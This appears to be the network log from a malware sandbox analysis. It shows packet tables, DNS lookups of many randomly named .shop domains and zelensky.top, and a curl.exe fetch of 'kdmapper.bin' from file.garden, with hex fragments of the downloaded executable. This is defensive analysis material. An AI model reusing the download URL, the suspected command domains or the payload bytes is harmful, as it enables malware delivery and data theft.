Sep 30, 2024 18:25:32.363524914 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.363532066 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.363550901 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.367352962 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.367376089 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.367413998 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.367425919 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.367454052 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.367708921 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.367726088 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.367772102 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.367779016 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.367799997 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.368180990 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.368196964 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.368232012 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.368240118 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.368262053 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.368777990 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.368793011 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.368829012 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.368835926 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.368859053 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.368967056 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.368993044 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.369014025 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.369019032 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.369034052 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.369040012 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:32.369093895 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.382937908 CEST	49709	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:25:32.382965088 CEST	443	49709	188.114.96.3	192.168.2.8
Sep 30, 2024 18:25:34.128125906 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 30, 2024 18:25:34.128173113 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:25:34.128226042 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 30, 2024 18:25:34.131450891 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 30, 2024 18:25:34.131469011 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:25:34.800653934 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:25:34.800873041 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 30, 2024 18:25:34.803632975 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 30, 2024 18:25:34.803653002 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:25:34.803898096 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:25:34.844202995 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 30, 2024 18:25:34.866677046 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 30, 2024 18:25:34.907399893 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:25:35.520870924 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:25:35.520935059 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:25:35.520946026 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 30, 2024 18:25:35.520972967 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:25:35.520998955 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:25:35.521024942 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 30, 2024 18:25:35.521038055 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 30, 2024 18:25:35.521045923 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:25:35.521100998 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 30, 2024 18:25:35.521116972 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:25:35.562999964 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 30, 2024 18:25:35.622006893 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:25:35.622021914 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:25:35.622045994 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:25:35.622077942 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:25:35.622113943 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 30, 2024 18:25:35.622143030 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:25:35.622159004 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 30, 2024 18:25:35.622179031 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 30, 2024 18:25:35.626774073 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:25:35.626866102 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 30, 2024 18:25:35.626877069 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:25:35.626921892 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 30, 2024 18:25:35.628209114 CEST	49710	443	192.168.2.8	104.102.49.254
Sep 30, 2024 18:25:35.628231049 CEST	443	49710	104.102.49.254	192.168.2.8
Sep 30, 2024 18:25:35.657757998 CEST	49711	443	192.168.2.8	104.21.84.213
Sep 30, 2024 18:25:35.657872915 CEST	443	49711	104.21.84.213	192.168.2.8
Sep 30, 2024 18:25:35.657963037 CEST	49711	443	192.168.2.8	104.21.84.213
Sep 30, 2024 18:25:35.658365011 CEST	49711	443	192.168.2.8	104.21.84.213
Sep 30, 2024 18:25:35.658385038 CEST	443	49711	104.21.84.213	192.168.2.8
Sep 30, 2024 18:25:36.151354074 CEST	443	49711	104.21.84.213	192.168.2.8
Sep 30, 2024 18:25:36.151439905 CEST	49711	443	192.168.2.8	104.21.84.213
Sep 30, 2024 18:25:36.153203964 CEST	49711	443	192.168.2.8	104.21.84.213
Sep 30, 2024 18:25:36.153215885 CEST	443	49711	104.21.84.213	192.168.2.8
Sep 30, 2024 18:25:36.153485060 CEST	443	49711	104.21.84.213	192.168.2.8
Sep 30, 2024 18:25:36.154823065 CEST	49711	443	192.168.2.8	104.21.84.213
Sep 30, 2024 18:25:36.154834032 CEST	49711	443	192.168.2.8	104.21.84.213
Sep 30, 2024 18:25:36.154895067 CEST	443	49711	104.21.84.213	192.168.2.8
Sep 30, 2024 18:25:36.659127951 CEST	443	49711	104.21.84.213	192.168.2.8
Sep 30, 2024 18:25:36.659225941 CEST	443	49711	104.21.84.213	192.168.2.8
Sep 30, 2024 18:25:36.659315109 CEST	49711	443	192.168.2.8	104.21.84.213
Sep 30, 2024 18:25:36.659498930 CEST	49711	443	192.168.2.8	104.21.84.213
Sep 30, 2024 18:25:36.659498930 CEST	49711	443	192.168.2.8	104.21.84.213
Sep 30, 2024 18:25:36.659547091 CEST	443	49711	104.21.84.213	192.168.2.8
Sep 30, 2024 18:25:36.659575939 CEST	443	49711	104.21.84.213	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 30, 2024 18:25:28.353456974 CEST	64379	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:25:28.364108086 CEST	53	64379	1.1.1.1	192.168.2.8
Sep 30, 2024 18:25:34.002553940 CEST	50097	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:25:34.013037920 CEST	53	50097	1.1.1.1	192.168.2.8
Sep 30, 2024 18:25:34.017153025 CEST	55617	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:25:34.025981903 CEST	53	55617	1.1.1.1	192.168.2.8
Sep 30, 2024 18:25:34.028835058 CEST	63708	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:25:34.038443089 CEST	53	63708	1.1.1.1	192.168.2.8
Sep 30, 2024 18:25:34.039669037 CEST	65196	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:25:34.051625013 CEST	53	65196	1.1.1.1	192.168.2.8
Sep 30, 2024 18:25:34.053128004 CEST	57162	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:25:34.064023972 CEST	53	57162	1.1.1.1	192.168.2.8
Sep 30, 2024 18:25:34.065314054 CEST	57903	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:25:34.075895071 CEST	53	57903	1.1.1.1	192.168.2.8
Sep 30, 2024 18:25:34.078527927 CEST	53256	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:25:34.089922905 CEST	53	53256	1.1.1.1	192.168.2.8
Sep 30, 2024 18:25:34.091139078 CEST	64156	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:25:34.100282907 CEST	53	64156	1.1.1.1	192.168.2.8
Sep 30, 2024 18:25:34.101466894 CEST	53502	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:25:34.110971928 CEST	53	53502	1.1.1.1	192.168.2.8
Sep 30, 2024 18:25:34.113493919 CEST	49921	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:25:34.122847080 CEST	53	49921	1.1.1.1	192.168.2.8
Sep 30, 2024 18:25:35.631908894 CEST	50623	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:25:35.656889915 CEST	53	50623	1.1.1.1	192.168.2.8
Sep 30, 2024 18:26:01.576402903 CEST	58797	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:26:01.644893885 CEST	53	58797	1.1.1.1	192.168.2.8
Sep 30, 2024 18:26:12.960388899 CEST	49399	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:26:12.968518972 CEST	53	49399	1.1.1.1	192.168.2.8
Sep 30, 2024 18:26:21.769926071 CEST	52177	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:26:22.118455887 CEST	53	52177	1.1.1.1	192.168.2.8
Sep 30, 2024 18:26:46.367573023 CEST	61018	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:26:46.377038956 CEST	53	61018	1.1.1.1	192.168.2.8
Sep 30, 2024 18:26:52.854583025 CEST	64475	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:26:52.862545013 CEST	53	64475	1.1.1.1	192.168.2.8
Sep 30, 2024 18:27:01.116763115 CEST	53212	53	192.168.2.8	1.1.1.1
Sep 30, 2024 18:27:01.129597902 CEST	53	53212	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 30, 2024 18:25:28.353456974 CEST	192.168.2.8	1.1.1.1	0x5954	Standard query (0)	file.garden	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:25:34.002553940 CEST	192.168.2.8	1.1.1.1	0xb6f5	Standard query (0)	tiddymarktwo.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:25:34.017153025 CEST	192.168.2.8	1.1.1.1	0xc8a0	Standard query (0)	surveriysiop.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:25:34.028835058 CEST	192.168.2.8	1.1.1.1	0xffe7	Standard query (0)	captainynfanw.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:25:34.039669037 CEST	192.168.2.8	1.1.1.1	0x2796	Standard query (0)	tearrybyiwo.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:25:34.053128004 CEST	192.168.2.8	1.1.1.1	0x423	Standard query (0)	appleboltelwk.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:25:34.065314054 CEST	192.168.2.8	1.1.1.1	0x13d7	Standard query (0)	tendencerangej.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:25:34.078527927 CEST	192.168.2.8	1.1.1.1	0x3b91	Standard query (0)	fossillargeiw.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:25:34.091139078 CEST	192.168.2.8	1.1.1.1	0xcc0a	Standard query (0)	coursedonnyre.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:25:34.101466894 CEST	192.168.2.8	1.1.1.1	0xaa23	Standard query (0)	strappystyio.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:25:34.113493919 CEST	192.168.2.8	1.1.1.1	0xf9c9	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:25:35.631908894 CEST	192.168.2.8	1.1.1.1	0x6a5a	Standard query (0)	offeviablwke.site	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:26:01.576402903 CEST	192.168.2.8	1.1.1.1	0xe599	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:26:12.960388899 CEST	192.168.2.8	1.1.1.1	0x2b85	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:26:21.769926071 CEST	192.168.2.8	1.1.1.1	0xdf31	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:26:46.367573023 CEST	192.168.2.8	1.1.1.1	0x8d3a	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:26:52.854583025 CEST	192.168.2.8	1.1.1.1	0xd00e	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:27:01.116763115 CEST	192.168.2.8	1.1.1.1	0x6f5d	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 30, 2024 18:25:28.364108086 CEST	1.1.1.1	192.168.2.8	0x5954	No error (0)	file.garden		188.114.96.3	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:25:28.364108086 CEST	1.1.1.1	192.168.2.8	0x5954	No error (0)	file.garden		188.114.97.3	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:25:34.013037920 CEST	1.1.1.1	192.168.2.8	0xb6f5	Name error (3)	tiddymarktwo.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:25:34.025981903 CEST	1.1.1.1	192.168.2.8	0xc8a0	Name error (3)	surveriysiop.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:25:34.038443089 CEST	1.1.1.1	192.168.2.8	0xffe7	Name error (3)	captainynfanw.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:25:34.051625013 CEST	1.1.1.1	192.168.2.8	0x2796	Name error (3)	tearrybyiwo.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:25:34.064023972 CEST	1.1.1.1	192.168.2.8	0x423	Name error (3)	appleboltelwk.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:25:34.075895071 CEST	1.1.1.1	192.168.2.8	0x13d7	Name error (3)	tendencerangej.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:25:34.089922905 CEST	1.1.1.1	192.168.2.8	0x3b91	Name error (3)	fossillargeiw.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:25:34.100282907 CEST	1.1.1.1	192.168.2.8	0xcc0a	Name error (3)	coursedonnyre.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:25:34.110971928 CEST	1.1.1.1	192.168.2.8	0xaa23	Name error (3)	strappystyio.shop	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:25:34.122847080 CEST	1.1.1.1	192.168.2.8	0xf9c9	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:25:35.656889915 CEST	1.1.1.1	192.168.2.8	0x6a5a	No error (0)	offeviablwke.site		104.21.84.213	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:25:35.656889915 CEST	1.1.1.1	192.168.2.8	0x6a5a	No error (0)	offeviablwke.site		172.67.197.40	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:26:01.644893885 CEST	1.1.1.1	192.168.2.8	0xe599	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:26:12.968518972 CEST	1.1.1.1	192.168.2.8	0x2b85	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:26:22.118455887 CEST	1.1.1.1	192.168.2.8	0xdf31	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:26:46.377038956 CEST	1.1.1.1	192.168.2.8	0x8d3a	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:26:52.862545013 CEST	1.1.1.1	192.168.2.8	0xd00e	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:27:01.129597902 CEST	1.1.1.1	192.168.2.8	0x6f5d	Name error (3)	zelensky.top	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

file.garden

steamcommunity.com

offeviablwke.site

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49706	188.114.96.3	443	2332	C:\Windows\System32\curl.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 16:25:28 UTC	104	OUT	GET /ZmE_ziOgiFXI9Y48/kdmapper.bin HTTP/1.1 Host: file.garden User-Agent: curl/7.83.1 Accept: /
2024-09-30 16:25:29 UTC	813	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 16:25:29 GMT Content-Type: application/octet-stream Content-Length: 2284739 Connection: close x-powered-by: Express access-control-allow-origin: * content-security-policy: default-src file.garden linkh.at data: mediastream: blob: 'unsafe-inline' 'unsafe-eval' last-modified: Fri, 20 Sep 2024 19:21:00 GMT Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 853448 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=blevm4%2FQ8EQ4%2FjHQPFfF4ku02Bn5QDFzapPeI2b55q6V6HmoYrniroWoeb6s9gI58atO4AdwcEvjOds4gGRKYXWOsvt2DIGCS9tnaWMvfgR3Vmf8tZYz7TKSqYx9Dw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb591b40a2942e9-EWR
2024-09-30 16:25:29 UTC	556	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 78 5f 63 ed 3c 3e 0d be 3c 3e 0d be 3c 3e 0d be 88 a2 fc be 31 3e 0d be 88 a2 fe be b2 3e 0d be 88 a2 ff be 24 3e 0d be 9d 49 f0 be 3e 3e 0d be 9d 49 09 bf 2f 3e 0d be 9d 49 0e bf 2b 3e 0d be 9d 49 08 bf 08 3e 0d be 35 46 8e be 37 3e 0d be 35 46 9e be 3b 3e 0d be 3c 3e 0c be 29 3f 0d be c9 49 08 bf 0d 3e 0d be c9 49 0d bf 3d 3e 0d be c9 49 f2 be 3d 3e 0d be c9 49 0f bf 3d 3e 0d Data Ascii: MZ@!L!This program cannot be run in DOS mode.$x_c<><><>1>>$>I>>I/>I+>I>5F7>5F;><>)?I>I=>I=>I=>
2024-09-30 16:25:29 UTC	1369	IN	Data Raw: 20 00 00 60 2e 72 64 61 74 61 00 00 c0 ae 00 00 00 30 03 00 00 b0 00 00 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 20 47 02 00 00 e0 03 00 00 10 00 00 00 d0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 90 01 00 00 00 30 06 00 00 02 00 00 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 df 00 00 00 40 06 00 00 e0 00 00 00 e2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 3c 23 00 00 00 20 07 00 00 24 00 00 00 c2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: `.rdata0 @@.data G@.didat0@.rsrc@@@.reloc<# $@B
2024-09-30 16:25:29 UTC	1369	IN	Data Raw: 32 c0 5d c2 1c 00 55 8b ec 83 ec 4c ff 75 08 8d 4d b4 e8 2a 02 00 00 8b 4d f4 83 f9 08 73 0a 8b 45 0c 89 44 8d b4 ff 45 f4 8d 4d b4 e8 48 02 01 00 c9 c2 08 00 56 ff 74 24 08 8b f1 33 c0 89 06 89 46 04 89 46 08 89 46 0c 88 46 10 e8 5c 03 00 00 8b c6 5e c2 04 00 b8 35 26 43 00 e8 92 d7 01 00 51 51 53 56 8b f1 89 75 f0 e8 62 81 00 00 33 db c7 06 f8 35 43 00 8d 8e 38 10 00 00 89 5d fc e8 2d 4a 00 00 8d 8e f8 20 00 00 c6 45 fc 01 e8 27 ba 00 00 8d 8e 98 22 00 00 89 9e e8 21 00 00 89 9e ec 21 00 00 e8 4a 01 00 00 8d 8e e8 45 00 00 e8 3f 01 00 00 8b 4d 08 85 c9 c6 45 fc 04 0f 94 c0 89 9e d4 21 00 00 88 86 d0 21 00 00 85 c9 75 23 68 f0 92 00 00 e8 d7 d6 01 00 59 89 45 ec c6 45 fc 05 85 c0 74 09 8b c8 e8 91 a0 00 00 eb 06 8b c3 eb 02 8b c1 89 86 d4 21 00 00 8a 80 Data Ascii: 2]ULuM*MsEDEMHVt$3FFFF\^5&CQQSVub35C8]-J E'"!!JE?ME!!u#hYEEt!
2024-09-30 16:25:29 UTC	1369	IN	Data Raw: 50 6a 39 e8 a5 fa ff ff 6a 02 b9 98 10 44 00 e8 3f 53 00 00 5e c2 04 00 53 56 8b f1 33 db 57 53 8b 3e 38 9e 3c 22 00 00 74 3d 8b 86 d8 6c 00 00 8b 4f 10 83 c0 14 53 50 ff 15 78 32 43 00 8b ce ff 57 10 8b ce e8 05 22 00 00 85 c0 74 15 83 be f4 21 00 00 75 75 0c 8b 44 24 10 39 58 04 0f 97 c0 eb 3c 32 c0 eb 38 e8 85 08 00 00 8b 4f 10 52 50 ff 15 78 32 43 00 8b ce ff 57 10 68 70 36 43 00 8b ce e8 3d 26 00 00 85 c0 74 11 ff 74 24 10 8b ce e8 db 04 00 00 84 c0 74 02 b3 01 8a c3 5f 5e 5b c2 04 00 80 b9 d4 6c 00 00 00 8b 54 24 04 74 1a 8b c2 f7 d8 83 e0 0f 03 d0 83 b9 c8 6c 00 00 03 75 05 83 c2 10 eb 03 83 c2 08 8b c2 c2 04 00 55 8b e9 80 bd ce 6c 00 00 00 75 04 32 c0 eb 41 8b 45 00 53 56 57 8b 70 14 8b ce ff 15 78 32 43 00 8b cd ff d6 ff 74 24 14 8b cd 8b f8 8b Data Ascii: Pj9jD?S^SV3WS>8<"t=lOSPx2CW"t!uuD$9X<28ORPx2CWhp6C=&tt$t_^[lT$tluUlu2AESVWpx2Ct$
2024-09-30 16:25:29 UTC	1369	IN	Data Raw: 02 eb 10 3c 01 75 04 6a 03 eb 08 2c 02 3c 02 77 03 6a 04 59 8b c1 c2 08 00 b8 73 26 43 00 e8 1e cd 01 00 83 ec 18 53 33 db 8b c1 89 45 f0 89 5d dc 89 5d e0 89 5d e4 89 5d e8 88 5d ec 53 53 8d 4d dc 89 5d fc 51 8b c8 e8 36 1d 00 00 84 c0 0f 84 83 00 00 00 56 57 8b 7d e0 8d 4d dc 6a 01 e8 97 f8 ff ff 8b 4d e0 8b 45 dc 8b 75 08 88 5c 01 ff 8d 47 01 50 8b ce e8 f6 f9 ff ff 8b 45 f0 83 b8 c8 6c 00 00 03 75 0f ff 76 04 ff 36 ff 75 dc e8 6f fd 00 00 eb 2d f6 80 0c 46 00 00 01 74 17 d1 ef 57 ff 36 ff 75 dc e8 19 fd 00 00 8b 06 33 c9 66 89 0c 78 eb 0d ff 76 04 ff 36 ff 75 dc e8 89 fc 00 00 ff 36 e8 11 1f 02 00 59 50 8b ce e8 9e f9 ff ff 5f b3 01 5e 8b 45 dc c7 45 fc 02 00 00 00 85 c0 74 19 80 7d ec 00 74 0c ff 75 e4 50 e8 19 d5 00 00 8b 45 dc 50 e8 f9 1e 02 00 59 Data Ascii: <uj,<wjYs&CS3E]]]]]SSM]Q6VW}MjMEu\GPEluv6uo-FtW6u3fxv6u6YP_^EEt}tuPEPY
2024-09-30 16:25:29 UTC	1369	IN	Data Raw: 47 18 2b c2 83 f8 01 75 03 8d 69 01 8d b3 28 10 00 00 55 8b ce e8 13 fd ff ff 55 ff 36 8b cf e8 a9 a8 00 00 e9 90 04 00 00 8b cf e8 3b a9 00 00 8b c8 89 44 24 20 c1 e9 02 8d ab 08 21 00 00 80 e1 01 88 8b 06 21 00 00 8b c8 c1 e9 03 80 e1 01 88 8b 07 21 00 00 c6 83 08 22 00 00 00 c6 45 00 00 a8 01 74 29 8b cf e8 ff a8 00 00 8b f0 b8 ff 00 00 00 3b f0 72 02 8b f0 56 55 8b cf e8 4b a8 00 00 8b 44 24 20 c6 84 1e 08 21 00 00 00 a8 02 74 2b 8b cf e8 d2 a8 00 00 8b f0 b8 ff 00 00 00 3b f0 72 02 8b f0 56 8d 83 08 22 00 00 8b cf 50 e8 18 a8 00 00 c6 84 1e 08 22 00 00 00 80 bb 06 21 00 00 00 74 0d 8b cf e8 9e a8 00 00 89 83 08 23 00 00 80 bb 07 21 00 00 00 74 0d 8b cf e8 88 a8 00 00 89 83 0c 23 00 00 c6 83 05 21 00 00 01 e9 c4 03 00 00 8b cf e8 6f a8 00 00 8b cf 89 Data Ascii: G+ui(UU6;D$ !!!"Et);rVUKD$ !t+;rV"P"!t#!t#!o
2024-09-30 16:25:29 UTC	1369	IN	Data Raw: 08 74 0c 8b cb e8 09 17 00 00 e9 e2 09 00 00 33 c9 8d 45 40 51 51 51 51 50 8b 83 d4 21 00 00 8d b3 38 10 00 00 05 24 60 00 00 50 6a 04 51 8b ce e8 1c 37 00 00 89 75 3c eb 03 88 4d 5a 57 8d 4d 1c e8 5b a4 00 00 83 7d 34 00 74 b7 8d 4d 1c e8 89 a2 00 00 0f b7 c0 8d 4d 1c 89 83 fc 21 00 00 c6 83 0c 22 00 00 00 e8 5a a2 00 00 8d 4d 1c 0f b6 f0 e8 66 a2 00 00 0f b7 c0 8d 4d 1c 89 83 04 22 00 00 c1 e8 0e 24 01 88 83 0c 22 00 00 e8 4a a2 00 00 0f b7 c8 89 8b 08 22 00 00 89 b3 00 22 00 00 3b cf 73 0c 8b cb e8 41 f7 ff ff e9 3f 09 00 00 8b c6 6a 02 5a 83 e8 73 74 2a 83 e8 01 74 1b 83 e8 06 74 09 83 e8 01 75 28 6a 05 eb 02 6a 03 58 89 83 00 22 00 00 8b f0 eb 17 89 93 00 22 00 00 8b f2 eb 0d 33 f6 c7 83 00 22 00 00 01 00 00 00 46 89 b3 f4 21 00 00 83 fe 75 74 0e 83 Data Ascii: t3E@QQQQP!8$`PjQ7u<MZWM[}4tMM!"ZMfM"$"J"";sA?jZst*ttu(jjX""3"F!ut
